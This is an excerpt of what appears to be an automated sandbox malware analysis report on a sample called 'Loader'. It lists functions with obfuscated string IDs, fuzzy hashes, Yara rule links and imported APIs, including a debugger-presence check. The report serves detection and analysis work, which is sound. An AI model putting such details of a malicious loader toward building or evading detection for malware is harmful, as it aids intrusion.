                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 3]'$3]'$bmnvidjapmuqvqlivxazircppbjomunmxpjyeiwubtphnmhendbjxyloyarbch$mag#$mag#
                                                                                                                                                                                                                                                                  • API String ID: 0-574533846
                                                                                                                                                                                                                                                                  • Opcode ID: 3014ad46f99848b6691db9f6123549e2519d124a4b5f12adca82e5626f9abc76
                                                                                                                                                                                                                                                                  • Instruction ID: c57b558a2303960562045a83225ccd9918b018025e3e1900a553c9b7397bf114
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3014ad46f99848b6691db9f6123549e2519d124a4b5f12adca82e5626f9abc76
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE525A32318B018FC718CE7CD5917DA37F3AB53364F209A19D466C7F94D62AE51A8B41
                                                                                                                                                                                                                                                                  Function 6CE5167C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE51774
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE5177E
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE5178B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                  • String ID: ,Ql
                                                                                                                                                                                                                                                                  • API String ID: 3906539128-1692949582
                                                                                                                                                                                                                                                                  • Opcode ID: e10657d94043f350d030f79680e812eb5c1785047af2d11c2fd8dcd0e080ae84
                                                                                                                                                                                                                                                                  • Instruction ID: 7a2fe4b7c9918506ed51f292001fc70f6710523918f86476b4349e6e40fc20b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e10657d94043f350d030f79680e812eb5c1785047af2d11c2fd8dcd0e080ae84
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8031C474D11218ABCB21DF68D8887DDBBB8BF08714F6042EAE41CA7250E7749B858F54
                                                                                                                                                                                                                                                                  Function 6CE41360 Relevance: 6.8, Strings: 4, Instructions: 1760COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ACx$ACx$N1?a$gR,
                                                                                                                                                                                                                                                                  • API String ID: 0-368147248
                                                                                                                                                                                                                                                                  • Opcode ID: 8523f891e5d1decb836db2b6919288929d96643e405f75f060e7bbdc76e514a0
                                                                                                                                                                                                                                                                  • Instruction ID: da9b2edb696ef32be3ecffca26f47e970c1e7aadc8c2be209858e810ff9e7537
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8523f891e5d1decb836db2b6919288929d96643e405f75f060e7bbdc76e514a0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46C21B36B406158FDF088DBCE9D93DE77F2AB57365F21D619C425DFB94C62A880A8B00
                                                                                                                                                                                                                                                                  Function 6CE44AA0 Relevance: 6.3, Strings: 4, Instructions: 1267COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: U0DU$U0DU$`$`
                                                                                                                                                                                                                                                                  • API String ID: 0-1056640726
                                                                                                                                                                                                                                                                  • Opcode ID: e3cc1e104e82f686162457f271ee52ec0f07fccd317c09e9c1da68f3f21cc966
                                                                                                                                                                                                                                                                  • Instruction ID: 78667f1bc81d859001e55d88d489f92ca936f86471bdf3d196e236e0b9518db2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3cc1e104e82f686162457f271ee52ec0f07fccd317c09e9c1da68f3f21cc966
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F692E536B556118FCB04CEBCE5E53DE7BF2AB47365F30D51AE411DBB94C62A890A8B00
                                                                                                                                                                                                                                                                  Function 6CE33BB0 Relevance: 6.1, Strings: 4, Instructions: 1108COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ($~"$($~"$Y*,O$?%
                                                                                                                                                                                                                                                                  • API String ID: 0-1332160593
                                                                                                                                                                                                                                                                  • Opcode ID: eaf8273b7031ad224de750c06782eac0167bb2c0ba1ac53b175c11d07eec648c
                                                                                                                                                                                                                                                                  • Instruction ID: bbfd880d43f3722322e22a23d8304d84b498d8a7695ae628b2e87c640583464b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaf8273b7031ad224de750c06782eac0167bb2c0ba1ac53b175c11d07eec648c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5821036B442158FCB08CEACD5D17CD7BF2AB47344F35A116E41ADBB94C23AA90ACB05
                                                                                                                                                                                                                                                                  Function 6CE4F194 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CE4F1A0
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 6CE4F26C
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CE4F28C
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 6CE4F296
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                                  • Opcode ID: cdc1d6cf75679f29175555e4cbdff6be474faec03d29a8044b2f607afefae650
                                                                                                                                                                                                                                                                  • Instruction ID: 1f90d816542a0bae41613bc1b52875acc752d2bf4ca2685816daec1b58730740
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdc1d6cf75679f29175555e4cbdff6be474faec03d29a8044b2f607afefae650
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89313875D4521CDBDB10DFA0D989BCDBBB8BF08704F1041AAE408AB240EB759A898F54
                                                                                                                                                                                                                                                                  Function 6CE4C660 Relevance: 6.0, Strings: 4, Instructions: 1027COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: m+$3$m+$3$oQ$oQ
                                                                                                                                                                                                                                                                  • API String ID: 0-1102830255
                                                                                                                                                                                                                                                                  • Opcode ID: af08345887736150235ad44877f7fe80d4fcb63b1a30075763b4188d2eece99a
                                                                                                                                                                                                                                                                  • Instruction ID: d01c24559d9f2664a656b85219a739e8775bd5d83d4cfa488f32ad3c9694bda4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af08345887736150235ad44877f7fe80d4fcb63b1a30075763b4188d2eece99a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32720236B515058FCF089E7CE5E53DE3BF2AB47324F34A519D8219BB94C22A990F8B50
                                                                                                                                                                                                                                                                  Function 6CE27F20 Relevance: 6.0, Strings: 4, Instructions: 986COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 3K$3K$M4$M4
                                                                                                                                                                                                                                                                  • API String ID: 0-1439431927
                                                                                                                                                                                                                                                                  • Opcode ID: c2afbc9febee9db32de35f9f0890101049c56ae8fa139c865d9066d7d4834cf3
                                                                                                                                                                                                                                                                  • Instruction ID: 0e1f112dc20ff604aef8ac10165678222af6c141e47498f0c78f82660537060d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2afbc9febee9db32de35f9f0890101049c56ae8fa139c865d9066d7d4834cf3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D52D077A416018FDF08CE7CD4957CE7BF3AB47365F24911AE821E7B94C22E894A8B11
                                                                                                                                                                                                                                                                  Function 6CE4B500 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 6CE4B8A0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                                  • String ID: .HeH
                                                                                                                                                                                                                                                                  • API String ID: 4194217158-2142080297
                                                                                                                                                                                                                                                                  • Opcode ID: b45955622d29e842256bf00ecfe6ad029254b47805c4fca11b972f92a98f0468
                                                                                                                                                                                                                                                                  • Instruction ID: 28aa3a40e3345f3efe9980297eb1d38dd80e5e560218dd4e1b0b7e8ccdc0515b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b45955622d29e842256bf00ecfe6ad029254b47805c4fca11b972f92a98f0468
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23B14C76E40A01CFDF04CEBCE4A43DE7BF2AB57324F24A619C521AB794C32A540ADB50
                                                                                                                                                                                                                                                                  Function 6CE3C840 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 6CE3C97C
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE4F62B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CE4F637
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                                  • API String ID: 1997705970-2556327735
                                                                                                                                                                                                                                                                  • Opcode ID: d1414868d38465fb3e2cb41107ececcc07c8454dbd15bc58cef96d4e5845834f
                                                                                                                                                                                                                                                                  • Instruction ID: 19b9ad8cfd970d3f177367555849c3de310a000ff9e8f1baa150366715f9716a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1414868d38465fb3e2cb41107ececcc07c8454dbd15bc58cef96d4e5845834f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72614432B806754FDF04ED7CC9E43EF27F2AB03364F246719C82697B94C22A960A9751
                                                                                                                                                                                                                                                                  Function 6CE24460 Relevance: 5.4, Strings: 2, Instructions: 2857COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: YoK$YoK
                                                                                                                                                                                                                                                                  • API String ID: 0-20192708
                                                                                                                                                                                                                                                                  • Opcode ID: 53f4710a7ba1e4c5dd25f643dee49dc6a7520ec8aa551fa4dd0127d8d98baefa
                                                                                                                                                                                                                                                                  • Instruction ID: 2946acec968ca7d4abecb7dea03146eb5ba548a149cd545612c04b0a335e38b2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53f4710a7ba1e4c5dd25f643dee49dc6a7520ec8aa551fa4dd0127d8d98baefa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A232536B406108FDB08CE3CD9D57CD77F2AB47324F209259D829EB795D63A8A4A8F50
                                                                                                                                                                                                                                                                  Function 6CE47250 Relevance: 5.3, APIs: 3, Instructions: 796COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 6CE47D36
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2659868963-0
                                                                                                                                                                                                                                                                  • Opcode ID: 47413c274223dbcd42093d310aebf1fc19eae3dd5be38a0fdeddf6f83bf399a5
                                                                                                                                                                                                                                                                  • Instruction ID: 694c6155cb2cd4cde0cae8c53c1734fe040da61262ff863636fa778a833e21ec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47413c274223dbcd42093d310aebf1fc19eae3dd5be38a0fdeddf6f83bf399a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C423572B545018FCF08CE7CE5D53EE3BF2AB47354F209519D412EBB98D62A890ACB81
                                                                                                                                                                                                                                                                  Function 6CE4D410 Relevance: 4.6, Strings: 3, Instructions: 868COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: [<)P$[<)P$\"&
                                                                                                                                                                                                                                                                  • API String ID: 0-1706468972
                                                                                                                                                                                                                                                                  • Opcode ID: 8e42b658169a23a34115dd5746c0a86eee20baf51348705151745259d9bb10ad
                                                                                                                                                                                                                                                                  • Instruction ID: d312eb9018fd419c240f4a7cc731a0772aa3de927a95ba05b5522c62655e0bc2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e42b658169a23a34115dd5746c0a86eee20baf51348705151745259d9bb10ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4952F27AA456018FCB08CE7CF5D53CD77F2AB47365F34E115E421EBB94C62A9A0A8B40
                                                                                                                                                                                                                                                                  Function 6CE51D62 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,6CE51D61,?,00000001,?,?), ref: 6CE51D84
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,6CE51D61,?,00000001,?,?), ref: 6CE51D8B
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 6CE51D9D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                  • Opcode ID: 125bfb0e0c93b9fdf7c9c643f1bb6669eb34bcb09b81bc713f5c8323e34a8c14
                                                                                                                                                                                                                                                                  • Instruction ID: 69b960ecf540b600605f0fea3bd9b9e9756c1e72d39b8282f0c48ee950cfa1d9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 125bfb0e0c93b9fdf7c9c643f1bb6669eb34bcb09b81bc713f5c8323e34a8c14
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E08C31150108AFCF012FA0C908AA83F39EF0535ABE00418F90986620CB3BD9A6CBA0
                                                                                                                                                                                                                                                                  Function 6CE333E0 Relevance: 4.3, Strings: 3, Instructions: 548COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: :gwj$b8$bC
                                                                                                                                                                                                                                                                  • API String ID: 0-4041010504
                                                                                                                                                                                                                                                                  • Opcode ID: ce9b077ad8457dc1c02e49440921995e1b0eacbcf1356cd2641c2d83944d222a
